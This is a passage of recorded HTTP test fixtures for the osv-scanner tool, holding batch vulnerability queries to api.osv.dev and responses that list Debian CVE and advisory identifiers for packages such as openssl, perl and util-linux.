"DEBIAN-CVE-2025-24928", "modified": "2025-11-20T10:18:05.778161Z" }, { "id": "DEBIAN-CVE-2025-27113", "modified": "2025-11-20T10:18:06.358243Z" }, { "id": "DEBIAN-CVE-2025-32414", "modified": "2025-11-20T10:18:08.076077Z" }, { "id": "DEBIAN-CVE-2025-32415", "modified": "2025-11-20T10:18:08.251077Z" }, { "id": "DEBIAN-CVE-2025-49794", "modified": "2025-11-20T10:18:23.322205Z" }, { "id": "DEBIAN-CVE-2025-49796", "modified": "2025-11-20T10:18:23.585429Z" }, { "id": "DEBIAN-CVE-2025-6021", "modified": "2025-11-20T10:18:26.314947Z" }, { "id": "DEBIAN-CVE-2025-6170", "modified": "2025-11-20T10:18:26.670728Z" }, { "id": "DEBIAN-CVE-2025-8732", "modified": "2025-12-14T10:13:26.467517Z" }, { "id": "DEBIAN-CVE-2025-9714", "modified": "2026-01-10T14:08:12.148171Z" }, { "id": "DEBIAN-CVE-2026-0989", "modified": "2026-01-16T11:05:07.928323Z" }, { "id": "DEBIAN-CVE-2026-0990", "modified": "2026-01-16T11:05:23.527352Z" }, { "id": "DEBIAN-CVE-2026-0992", "modified": "2026-01-16T11:05:10.515041Z" }, { "id": "DEBIAN-CVE-2026-1757", "modified": "2026-02-03T11:16:44.779248Z" }, { "id": "DLA-3012-1", "modified": "2026-03-09T01:20:46.878115Z" }, { "id": "DLA-3172-1", "modified": "2026-03-09T01:19:54.747665Z" }, { "id": "DLA-3405-1", "modified": "2026-03-09T01:01:29.748040Z" }, { "id": "DLA-3878-1", "modified": "2026-03-09T01:20:38.676387Z" }, { "id": "DLA-4064-1", "modified": "2026-03-09T01:20:30.558703Z" }, { "id": "DLA-4146-1", "modified": "2026-03-09T01:22:43.732573Z" }, { "id": "DLA-4251-1", "modified": "2026-03-09T02:11:12.986866Z" }, { "id": "DLA-4319-1", "modified": "2025-09-30T22:17:08.381361Z" }, { "id": "DSA-5142-1", "modified": "2026-03-09T02:10:58.737631Z" }, { "id": "DSA-5271-1", "modified": "2026-03-09T02:10:55.154283Z" }, { "id": "DSA-5391-1", "modified": "2026-03-09T02:09:39.164621Z" }, { "id": "DSA-5949-1", "modified": "2026-03-09T02:09:32.257423Z" }, { "id": "DSA-5990-1", "modified": "2025-08-29T13:01:48.117026Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { 
"vulns": [ { "id": "DEBIAN-CVE-2018-0732", "modified": "2025-11-19T02:02:54.249966Z" }, { "id": "DEBIAN-CVE-2018-0734", "modified": "2025-11-19T02:02:43.768735Z" }, { "id": "DEBIAN-CVE-2018-0735", "modified": "2025-11-19T01:19:04.251217Z" }, { "id": "DEBIAN-CVE-2018-5407", "modified": "2025-11-19T01:02:00.203143Z" }, { "id": "DEBIAN-CVE-2019-1543", "modified": "2025-11-19T01:12:34.981629Z" }, { "id": "DEBIAN-CVE-2019-1547", "modified": "2025-11-19T01:12:35.687253Z" }, { "id": "DEBIAN-CVE-2019-1549", "modified": "2025-11-19T01:04:40.924710Z" }, { "id": "DEBIAN-CVE-2019-1551", "modified": "2025-11-19T01:19:08.067279Z" }, { "id": "DEBIAN-CVE-2019-1563", "modified": "2025-11-19T02:04:34.392400Z" }, { "id": "DEBIAN-CVE-2020-1967", "modified": "2025-11-19T02:04:38.886020Z" }, { "id": "DEBIAN-CVE-2020-1971", "modified": "2025-11-19T02:04:28.520483Z" }, { "id": "DEBIAN-CVE-2021-23840", "modified": "2025-11-19T01:03:14.356310Z" }, { "id": "DEBIAN-CVE-2021-23841", "modified": "2025-11-19T02:02:54.160482Z" }, { "id": "DEBIAN-CVE-2021-3449", "modified": "2025-11-19T01:04:41.495834Z" }, { "id": "DEBIAN-CVE-2021-3450", "modified": "2025-11-19T02:01:16.123253Z" }, { "id": "DEBIAN-CVE-2021-3711", "modified": "2025-11-20T10:15:44.121033Z" }, { "id": "DEBIAN-CVE-2021-3712", "modified": "2025-11-20T10:15:44.130193Z" }, { "id": "DEBIAN-CVE-2021-4160", "modified": "2025-11-20T10:15:10.185497Z" }, { "id": "DEBIAN-CVE-2022-0778", "modified": "2025-11-20T10:15:47.332694Z" }, { "id": "DEBIAN-CVE-2022-1292", "modified": "2025-11-20T10:15:25.471825Z" }, { "id": "DEBIAN-CVE-2022-2068", "modified": "2025-11-20T10:15:27.022420Z" }, { "id": "DEBIAN-CVE-2022-2097", "modified": "2025-11-20T10:15:27.065089Z" }, { "id": "DEBIAN-CVE-2022-2274", "modified": "2025-11-19T02:02:45.418259Z" }, { "id": "DEBIAN-CVE-2022-3358", "modified": "2025-11-19T01:06:25.721124Z" }, { "id": "DEBIAN-CVE-2022-3602", "modified": "2025-11-19T01:12:35.687556Z" }, { "id": "DEBIAN-CVE-2022-3786", "modified": 
"2025-11-19T01:19:02.748977Z" }, { "id": "DEBIAN-CVE-2022-3996", "modified": "2025-11-19T02:01:16.596616Z" }, { "id": "DEBIAN-CVE-2022-4203", "modified": "2025-11-19T02:01:16.313531Z" }, { "id": "DEBIAN-CVE-2022-4304", "modified": "2025-11-20T10:16:04.313466Z" }, { "id": "DEBIAN-CVE-2022-4450", "modified": "2025-11-20T10:16:05.367442Z" }, { "id": "DEBIAN-CVE-2023-0215", "modified": "2025-11-20T10:16:27.838296Z" }, { "id": "DEBIAN-CVE-2023-0216", "modified": "2025-11-19T02:04:35.947667Z" }, { "id": "DEBIAN-CVE-2023-0217", "modified": "2025-11-19T01:12:37.272749Z" }, { "id": "DEBIAN-CVE-2023-0286", "modified": "2025-11-20T10:16:27.985311Z" }, { "id": "DEBIAN-CVE-2023-0401", "modified": "2025-11-19T01:12:36.298552Z" }, { "id": "DEBIAN-CVE-2023-0464", "modified": "2025-11-20T10:16:28.057931Z" }, { "id": "DEBIAN-CVE-2023-0465", "modified": "2025-11-20T10:16:28.143046Z" }, { "id": "DEBIAN-CVE-2023-0466", "modified": "2025-11-20T10:16:28.053837Z" }, { "id": "DEBIAN-CVE-2023-1255", "modified": "2025-11-19T01:08:49.387669Z" }, { "id": "DEBIAN-CVE-2023-2650", "modified": "2025-11-20T10:17:34.439123Z" }, { "id": "DEBIAN-CVE-2023-2975", "modified": "2025-11-20T10:16:36.112183Z" }, { "id": "DEBIAN-CVE-2023-3446", "modified": "2025-11-20T10:16:38.860251Z" }, { "id": "DEBIAN-CVE-2023-3817", "modified": "2025-11-20T10:17:35.737266Z" }, { "id": "DEBIAN-CVE-2023-5363", "modified": "2025-11-20T10:16:59.430619Z" }, { "id": "DEBIAN-CVE-2023-5678", "modified": "2025-11-20T10:17:38.719690Z" }, { "id": "DEBIAN-CVE-2023-6129", "modified": "2025-11-20T10:17:39.029757Z" }, { "id": "DEBIAN-CVE-2023-6237", "modified": "2025-11-20T10:17:39.218097Z" }, { "id": "DEBIAN-CVE-2024-0727", "modified": "2025-11-20T10:17:01.258658Z" }, { "id": "DEBIAN-CVE-2024-12797", "modified": "2025-11-19T02:04:36.131726Z" }, { "id": "DEBIAN-CVE-2024-13176", "modified": "2026-03-17T02:49:44.824285Z" }, { "id": "DEBIAN-CVE-2024-2511", "modified": "2025-11-20T10:17:05.139581Z" }, { "id": "DEBIAN-CVE-2024-4603", 
"modified": "2025-11-20T10:17:43.955114Z" }, { "id": "DEBIAN-CVE-2024-4741", "modified": "2025-11-20T10:17:26.990307Z" }, { "id": "DEBIAN-CVE-2024-5535", "modified": "2025-11-20T10:17:48.194687Z" }, { "id": "DEBIAN-CVE-2024-6119", "modified": "2025-11-20T10:17:53.824117Z" }, { "id": "DEBIAN-CVE-2024-9143", "modified": "2025-11-20T10:17:55.864918Z" }, { "id": "DEBIAN-CVE-2025-11187", "modified": "2026-03-17T02:47:10.761659Z" }, { "id": "DEBIAN-CVE-2025-15467", "modified": "2026-03-17T02:51:11.866899Z" }, { "id": "DEBIAN-CVE-2025-15468", "modified": "2026-03-17T02:51:12.304672Z" }, { "id": "DEBIAN-CVE-2025-15469", "modified": "2026-03-17T02:51:12.299847Z" }, { "id": "DEBIAN-CVE-2025-27587", "modified": "2026-03-17T02:51:34.552234Z" }, { "id": "DEBIAN-CVE-2025-4575", "modified": "2025-11-19T02:02:43.971243Z" }, { "id": "DEBIAN-CVE-2025-66199", "modified": "2026-03-17T02:52:26.091887Z" }, { "id": "DEBIAN-CVE-2025-68160", "modified": "2026-03-17T02:50:42.645267Z" }, { "id": "DEBIAN-CVE-2025-69418", "modified": "2026-03-17T02:51:22.404226Z" }, { "id": "DEBIAN-CVE-2025-69419", "modified": "2026-03-17T02:51:22.497785Z" }, { "id": "DEBIAN-CVE-2025-69420", "modified": "2026-03-17T02:51:22.651361Z" }, { "id": "DEBIAN-CVE-2025-69421", "modified": "2026-03-17T02:51:22.561721Z" }, { "id": "DEBIAN-CVE-2025-9230", "modified": "2026-03-17T02:51:39.764914Z" }, { "id": "DEBIAN-CVE-2025-9231", "modified": "2026-03-17T02:51:39.727656Z" }, { "id": "DEBIAN-CVE-2025-9232", "modified": "2026-03-17T02:51:39.882696Z" }, { "id": "DEBIAN-CVE-2026-22795", "modified": "2026-03-17T02:51:47.646020Z" }, { "id": "DEBIAN-CVE-2026-22796", "modified": "2026-03-17T02:51:47.743030Z" }, { "id": "DEBIAN-CVE-2026-2673", "modified": "2026-03-18T09:03:28.363302Z" }, { "id": "DLA-3008-1", "modified": "2026-03-09T01:23:33.375630Z" }, { "id": "DLA-3325-1", "modified": "2026-03-09T01:19:40.983935Z" }, { "id": "DLA-3449-1", "modified": "2026-03-09T01:22:47.322805Z" }, { "id": "DLA-3530-1", "modified": 
"2026-03-09T01:19:28.929204Z" }, { "id": "DLA-3942-1", "modified": "2026-03-09T01:22:40.686044Z" }, { "id": "DLA-3942-2", "modified": "2026-03-09T01:21:01.728730Z" }, { "id": "DLA-4176-1", "modified": "2026-03-09T01:20:23.459313Z" }, { "id": "DLA-4321-1", "modified": "2025-10-03T16:33:24.717173Z" }, { "id": "DLA-4490-1", "modified": "2026-02-23T10:30:28.927832Z" }, { "id": "DSA-4539-1", "modified": "2026-03-09T02:09:20.276054Z" }, { "id": "DSA-4539-3", "modified": "2025-05-26T07:05:14.261652Z" }, { "id": "DSA-4661-1", "modified": "2026-03-09T02:08:53.792348Z" }, { "id": "DSA-4807-1", "modified": "2026-03-09T02:10:20.442914Z" }, { "id": "DSA-4855-1", "modified": "2026-03-09T02:11:29.405206Z" }, { "id": "DSA-4875-1", "modified": "2026-03-09T02:10:05.387501Z" }, { "id": "DSA-4963-1", "modified": "2026-03-09T02:10:15.488747Z" }, { "id": "DSA-5103-1", "modified": "2026-03-09T02:09:42.407559Z" }, { "id": "DSA-5139-1", "modified": "2026-03-09T02:09:17.334653Z" }, { "id": "DSA-5169-1", "modified": "2026-03-09T02:09:37.692763Z" }, { "id": "DSA-5343-1", "modified": "2026-03-09T02:09:47.149297Z" }, { "id": "DSA-5417-1", "modified": "2026-03-09T02:09:39.950679Z" }, { "id": "DSA-5532-1", "modified": "2026-03-09T02:08:31.395482Z" }, { "id": "DSA-5764-1", "modified": "2026-03-09T02:09:02.723874Z" }, { "id": "DSA-6015-1", "modified": "2025-10-01T13:32:01.848986Z" }, { "id": "DSA-6113-1", "modified": "2026-01-27T20:30:04.397078Z" } ] }, {}, { "vulns": [ { "id": "DEBIAN-CVE-2011-4116", "modified": "2025-11-20T10:10:50.058601Z" }, { "id": "DEBIAN-CVE-2017-12837", "modified": "2025-11-19T01:03:14.361068Z" }, { "id": "DEBIAN-CVE-2017-12883", "modified": "2025-11-19T01:12:38.323688Z" }, { "id": "DEBIAN-CVE-2018-12015", "modified": "2025-11-19T02:02:49.033339Z" }, { "id": "DEBIAN-CVE-2018-18311", "modified": "2025-11-19T01:12:36.918544Z" }, { "id": "DEBIAN-CVE-2018-18312", "modified": "2025-11-19T02:04:33.584277Z" }, { "id": "DEBIAN-CVE-2018-18313", "modified": 
"2025-11-19T01:06:24.154928Z" }, { "id": "DEBIAN-CVE-2018-18314", "modified": "2025-11-19T01:12:35.416886Z" }, { "id": "DEBIAN-CVE-2018-6797", "modified": "2025-11-19T02:04:23.831823Z" }, { "id": "DEBIAN-CVE-2018-6798", "modified": "2025-11-19T02:02:49.628171Z" }, { "id": "DEBIAN-CVE-2018-6913", "modified": "2025-11-19T02:02:50.593437Z" }, { "id": "DEBIAN-CVE-2020-10543", "modified": "2025-11-19T01:04:39.904198Z" }, { "id": "DEBIAN-CVE-2020-10878", "modified": "2025-11-19T01:12:35.457057Z" }, { "id": "DEBIAN-CVE-2020-12723", "modified": "2025-11-19T02:02:47.094787Z" }, { "id": "DEBIAN-CVE-2020-16156", "modified": "2025-11-20T10:14:36.701112Z" }, { "id": "DEBIAN-CVE-2021-36770", "modified": "2025-11-20T10:15:44.080114Z" }, { "id": "DEBIAN-CVE-2022-48522", "modified": "2025-11-19T01:08:52.915564Z" }, { "id": "DEBIAN-CVE-2023-31484", "modified": "2025-11-20T10:17:35.627220Z" }, { "id": "DEBIAN-CVE-2023-31486", "modified": "2026-03-17T02:48:35.857896Z" }, { "id": "DEBIAN-CVE-2023-47038", "modified": "2025-11-20T10:16:46.343364Z" }, { "id": "DEBIAN-CVE-2024-56406", "modified": "2025-11-20T10:17:48.686371Z" }, { "id": "DEBIAN-CVE-2025-40909", "modified": "2025-11-20T10:18:21.143971Z" }, { "id": "DLA-3926-1", "modified": "2026-03-09T01:20:46.118633Z" }, { "id": "DSA-5902-1", "modified": "2026-03-09T02:09:19.793163Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3072-1", "modified": "2026-03-09T01:22:24.680239Z" }, { "id": "DLA-3189-1", "modified": "2025-05-26T07:01:07.887113Z" }, { "id": "DLA-3316-1", "modified": "2025-05-26T07:01:13.127412Z" }, { "id": "DLA-3422-1", "modified": "2026-03-09T01:20:56.692752Z" }, { "id": "DLA-3600-1", "modified": "2026-03-09T01:17:49.966197Z" }, { "id": "DLA-3651-1", "modified": "2026-03-09T01:18:05.310519Z" }, { "id": "DLA-3764-1", "modified": "2026-03-09T01:23:22.273526Z" }, { "id": "DSA-5135-1", "modified": "2026-03-09T02:11:21.646978Z" } ] }, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2017-17512", "modified": 
"2025-11-19T02:04:30.656495Z" } ] }, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2005-2541", "modified": "2026-03-17T02:42:47.789952Z" }, { "id": "DEBIAN-CVE-2018-20482", "modified": "2025-11-19T02:02:47.070832Z" }, { "id": "DEBIAN-CVE-2019-9923", "modified": "2025-11-19T02:02:53.559001Z" }, { "id": "DEBIAN-CVE-2021-20193", "modified": "2025-11-19T01:01:55.139356Z" }, { "id": "DEBIAN-CVE-2022-48303", "modified": "2025-11-20T10:16:07.552593Z" }, { "id": "DEBIAN-CVE-2023-39804", "modified": "2025-11-20T10:16:41.587973Z" }, { "id": "DLA-3755-1", "modified": "2026-03-09T01:18:04.185679Z" } ] }, { "vulns": [ { "id": "DLA-3051-1", "modified": "2025-05-26T07:01:56.257796Z" }, { "id": "DLA-3134-1", "modified": "2025-05-26T07:01:01.500124Z" }, { "id": "DLA-3161-1", "modified": "2025-05-26T07:01:03.882213Z" }, { "id": "DLA-3366-1", "modified": "2025-05-26T07:01:17.027142Z" }, { "id": "DLA-3412-1", "modified": "2025-05-26T07:01:20.109212Z" }, { "id": "DLA-3684-1", "modified": "2025-05-26T07:01:38.953691Z" }, { "id": "DLA-3788-1", "modified": "2025-05-26T07:01:46.700929Z" }, { "id": "DLA-3972-1", "modified": "2025-05-26T07:02:05.284676Z" }, { "id": "DLA-4085-1", "modified": "2025-05-26T07:02:10.958749Z" }, { "id": "DLA-4105-1", "modified": "2025-05-26T07:02:13.921097Z" }, { "id": "DLA-4403-1", "modified": "2025-12-12T10:13:37.154747Z" } ] }, { "vulns": [ { "id": "DLA-4016-1", "modified": "2025-05-26T07:02:06.504254Z" } ] }, { "vulns": [ { "id": "DEBIAN-CVE-2016-2779", "modified": "2025-11-19T01:12:38.591462Z" }, { "id": "DEBIAN-CVE-2018-7738", "modified": "2025-11-20T10:13:54.493707Z" }, { "id": "DEBIAN-CVE-2021-37600", "modified": "2025-11-19T02:02:43.997954Z" }, { "id": "DEBIAN-CVE-2021-3995", "modified": "2025-11-20T10:15:45.587792Z" }, { "id": "DEBIAN-CVE-2021-3996", "modified": "2025-11-20T10:15:45.602424Z" }, { "id": "DEBIAN-CVE-2022-0563", "modified": "2026-03-17T02:46:43.123134Z" }, { "id": "DEBIAN-CVE-2024-28085", "modified": "2025-11-20T10:17:41.612682Z" }, { "id": 
"DEBIAN-CVE-2025-14104", "modified": "2026-03-05T17:00:58.361610Z" }, { "id": "DEBIAN-CVE-2026-3184", "modified": "2026-02-26T09:30:44.219098Z" }, { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" }, { "id": "DSA-5055-1", "modified": "2026-03-09T02:10:40.826335Z" }, { "id": "DSA-5650-1", "modified": "2026-03-09T02:08:30.371343Z" } ] }, { "vulns": [ { "id": "DEBIAN-CVE-2022-1271", "modified": "2025-11-20T10:15:47.940295Z" }, { "id": "DEBIAN-CVE-2024-3094", "modified": "2025-11-19T01:12:34.542011Z" }, { "id": "DEBIAN-CVE-2025-31115", "modified": "2025-11-20T10:18:07.484724Z" }, { "id": "DSA-5123-1", "modified": "2026-03-09T02:10:46.054497Z" }, { "id": "DSA-5895-1", "modified": "2026-03-09T02:08:52.515269Z" } ] }, {}, {} ] } headers: Content-Length: - "21542" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_ExplicitExtractors_WithDefaults.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 521 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.8" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_a_couple_of_specific_extractors_enabled_individually url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: 
proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 521 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.8" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_a_couple_of_specific_extractors_enabled_specified_together url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 521 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.8" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_an_extractor_that_does_not_exist url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 399 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { 
"ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_one_specific_extractor_disabled url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 22 body: | { "results": [ {}, {}, {} ] } headers: Content-Length: - "22" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 521 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.8" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_one_specific_extractor_enabled_and_the_defaults url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithDefaults/scanning_file_with_one_different_extractor_enabled url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } 
headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 144 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.8" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithDefaults/scanning_file_with_one_specific_extractor_enabled url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_ExplicitExtractors_WithoutDefaults.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 273 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.8" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_a_couple_of_specific_extractors_enabled_individually url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 19 body: | { "results": [ {}, {} ] } headers: Content-Length: - "19" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 273 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.8" } ] } headers: Content-Type: - 
application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_a_couple_of_specific_extractors_enabled_specified_together url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 19 body: | { "results": [ {}, {} ] } headers: Content-Length: - "19" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 144 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.8" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_an_extractor_that_does_not_exist url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 399 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_one_specific_extractor_disabled url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 22 body: | { "results": [ {}, {}, {} ] } headers: Content-Length: - "22" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 144 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": 
"npm", "name": "ansi-html" }, "version": "0.0.8" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_one_specific_extractor_enabled_and_no_defaults url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 144 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.8" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithoutDefaults/scanning_file_with_one_specific_extractor_enabled url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_GithubActions.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 238 host: api.osv.dev body: | { "queries": [ { "commit": "4579d5538f06c5ef615a15bc67ebb9ac0523a973" }, { "commit": "9de7a0544457c6aba755ccb65abb41b0dc1db70d" }, { "commit": "5d60bd2eb4642b64d00c845e5ca9f1ea41fd6db6" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_GithubActions/scanning_osv-scanner_custom_format url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 161 body: | { "results": [ {}, { "vulns": [ { "id": "CVE-2023-39137", "modified": "2026-03-15T14:11:43.205446Z" }, { "id": "CVE-2023-39139", 
"modified": "2026-03-14T12:08:30.752661Z" } ] }, {} ] } headers: Content-Length: - "161" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 238 host: api.osv.dev body: | { "queries": [ { "commit": "4579d5538f06c5ef615a15bc67ebb9ac0523a973" }, { "commit": "9de7a0544457c6aba755ccb65abb41b0dc1db70d" }, { "commit": "5d60bd2eb4642b64d00c845e5ca9f1ea41fd6db6" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_GithubActions/scanning_osv-scanner_custom_format_output_json url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 161 body: | { "results": [ {}, { "vulns": [ { "id": "CVE-2023-39137", "modified": "2026-03-15T14:11:43.205446Z" }, { "id": "CVE-2023-39139", "modified": "2026-03-14T12:08:30.752661Z" } ] }, {} ] } headers: Content-Length: - "161" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 169 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "GIT", "name": "github.com/openssl/openssl" }, "version": "openssl-3.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_GithubActions/scanning_osv-scanner_custom_format_with_git_tag url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 2593 body: | { "results": [ { "vulns": [ { "id": "CVE-2016-2177", "modified": "2026-03-15T22:22:35.782155Z" }, { "id": "CVE-2016-2182", "modified": "2026-03-15T22:06:16.823524Z" }, { "id": "CVE-2022-2274", "modified": "2026-03-14T00:45:56.901948Z" }, { "id": "CVE-2022-3358", "modified": "2026-03-15T22:44:12.519547Z" }, { "id": "CVE-2022-3996", "modified": "2026-03-15T22:44:21.336918Z" }, { "id": "CVE-2022-4203", "modified": "2026-03-14T11:56:48.298901Z" }, { "id": 